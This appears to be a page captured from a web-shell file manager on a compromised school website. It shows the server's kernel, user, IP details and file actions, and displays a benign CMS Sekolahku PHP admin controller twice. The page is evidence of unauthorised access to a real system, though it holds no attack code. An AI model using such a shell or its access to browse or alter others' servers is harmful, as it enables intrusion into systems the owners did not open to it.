Apache/2.4.7 (Ubuntu) Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) safemode : OFF MySQL: ON | Perl: ON | cURL: OFF | WGet: ON > / var / www / html / sman1baleendahoppppppp / application / core / | server ip : 172.67.156.115 your ip : 108.162.216.253 H O M E |
Filename | /var/www/html/sman1baleendahoppppppp/application/core/Admin_Controller.php |
Size | 3.02 kb |
Permission | rw-r--r-- |
Owner | root : root |
Create time | 04-May-2025 17:23 |
Last modified | 04-May-2025 17:23 |
Last accessed | 07-Jul-2025 00:40 |
Actions | edit | rename | delete | download (gzip) |
View | text | code | image |
<?php defined('BASEPATH') OR exit('No direct script access allowed');
/**
* CMS Sekolahku | CMS (Content Management System) dan PPDB/PMB Online GRATIS
* untuk sekolah SD/Sederajat, SMP/Sederajat, SMA/Sederajat, dan Perguruan Tinggi
* @version 2.4.13
* @author Anton Sofyan | https://facebook.com/antonsofyan | [email protected] | 0857 5988 8922
* @copyright (c) 2014-2023
* @link https://sekolahku.web.id
*
* PERINGATAN :
* 1. TIDAK DIPERKENANKAN MENGGUNAKAN CMS INI TANPA SEIZIN DARI PIHAK PENGEMBANG APLIKASI.
* 2. TIDAK DIPERKENANKAN MEMPERJUALBELIKAN APLIKASI INI TANPA SEIZIN DARI PIHAK PENGEMBANG APLIKASI.
* 3. TIDAK DIPERKENANKAN MENGHAPUS KODE SUMBER APLIKASI.
*/
class Admin_Controller extends MY_Controller {
/**
* Primary key
* @var string
*/
protected $pk;
/**
* Table
* @var string
*/
protected $table;
/**
* Class Constructor
*
* @return Void
*/
public function __construct() {
parent::__construct();
// Restrict
$this->auth->restrict();
// Check privileges Users
if ( ! in_array($this->uri->segment(1), __session('user_privileges'))) {
return redirect(base_url());
}
// $this->output->enable_profiler();
}
/**
* deleted data | SET is_deleted to true
*/
public function delete() {
if ($this->input->is_ajax_request()) {
$this->vars['status'] = 'warning';
$this->vars['message'] = 'not_selected';
$ids = explode(',', $this->input->post($this->pk));
if (count($ids) > 0) {
if($this->model->delete($ids, $this->table)) {
$this->vars = [
'status' => 'success',
'message' => 'deleted',
'id' => $ids
];
} else {
$this->vars = [
'status' => 'error',
'message' => 'not_deleted'
];
}
}
$this->output
->set_content_type('application/json', 'utf-8')
->set_output(json_encode($this->vars, self::REQUIRED_FLAGS))
->_display();
exit;
}
}
/**
* Restored data | SET is_deleted to false
*/
public function restore() {
if ($this->input->is_ajax_request()) {
$this->vars['status'] = 'warning';
$this->vars['message'] = 'not_selected';
$ids = explode(',', $this->input->post($this->pk));
if (count($ids) > 0) {
if($this->model->restore($ids, $this->table)) {
$this->vars = [
'status' => 'success',
'message' => 'restored',
'id' => $ids
];
} else {
$this->vars = [
'status' => 'error',
'message' => 'not_restored'
];
}
}
$this->output
->set_content_type('application/json', 'utf-8')
->set_output(json_encode($this->vars, self::REQUIRED_FLAGS))
->_display();
exit;
}
}
/**
* Find by ID
* @return Object
*/
public function find_id() {
if ($this->input->is_ajax_request()) {
$id = _toInteger($this->input->post('id', true));
$query = _isNaturalNumber( $id ) ? $this->model->RowObject($this->pk, $id, $this->table) : [];
$this->output
->set_content_type('application/json', 'utf-8')
->set_output(json_encode($query, self::REQUIRED_FLAGS))
->_display();
exit;
}
}
}
/**
* CMS Sekolahku | CMS (Content Management System) dan PPDB/PMB Online GRATIS
* untuk sekolah SD/Sederajat, SMP/Sederajat, SMA/Sederajat, dan Perguruan Tinggi
* @version 2.4.13
* @author Anton Sofyan | https://facebook.com/antonsofyan | [email protected] | 0857 5988 8922
* @copyright (c) 2014-2023
* @link https://sekolahku.web.id
*
* PERINGATAN :
* 1. TIDAK DIPERKENANKAN MENGGUNAKAN CMS INI TANPA SEIZIN DARI PIHAK PENGEMBANG APLIKASI.
* 2. TIDAK DIPERKENANKAN MEMPERJUALBELIKAN APLIKASI INI TANPA SEIZIN DARI PIHAK PENGEMBANG APLIKASI.
* 3. TIDAK DIPERKENANKAN MENGHAPUS KODE SUMBER APLIKASI.
*/
class Admin_Controller extends MY_Controller {
/**
* Primary key
* @var string
*/
protected $pk;
/**
* Table
* @var string
*/
protected $table;
/**
* Class Constructor
*
* @return Void
*/
public function __construct() {
parent::__construct();
// Restrict
$this->auth->restrict();
// Check privileges Users
if ( ! in_array($this->uri->segment(1), __session('user_privileges'))) {
return redirect(base_url());
}
// $this->output->enable_profiler();
}
/**
* deleted data | SET is_deleted to true
*/
public function delete() {
if ($this->input->is_ajax_request()) {
$this->vars['status'] = 'warning';
$this->vars['message'] = 'not_selected';
$ids = explode(',', $this->input->post($this->pk));
if (count($ids) > 0) {
if($this->model->delete($ids, $this->table)) {
$this->vars = [
'status' => 'success',
'message' => 'deleted',
'id' => $ids
];
} else {
$this->vars = [
'status' => 'error',
'message' => 'not_deleted'
];
}
}
$this->output
->set_content_type('application/json', 'utf-8')
->set_output(json_encode($this->vars, self::REQUIRED_FLAGS))
->_display();
exit;
}
}
/**
* Restored data | SET is_deleted to false
*/
public function restore() {
if ($this->input->is_ajax_request()) {
$this->vars['status'] = 'warning';
$this->vars['message'] = 'not_selected';
$ids = explode(',', $this->input->post($this->pk));
if (count($ids) > 0) {
if($this->model->restore($ids, $this->table)) {
$this->vars = [
'status' => 'success',
'message' => 'restored',
'id' => $ids
];
} else {
$this->vars = [
'status' => 'error',
'message' => 'not_restored'
];
}
}
$this->output
->set_content_type('application/json', 'utf-8')
->set_output(json_encode($this->vars, self::REQUIRED_FLAGS))
->_display();
exit;
}
}
/**
* Find by ID
* @return Object
*/
public function find_id() {
if ($this->input->is_ajax_request()) {
$id = _toInteger($this->input->post('id', true));
$query = _isNaturalNumber( $id ) ? $this->model->RowObject($this->pk, $id, $this->table) : [];
$this->output
->set_content_type('application/json', 'utf-8')
->set_output(json_encode($query, self::REQUIRED_FLAGS))
->_display();
exit;
}
}
}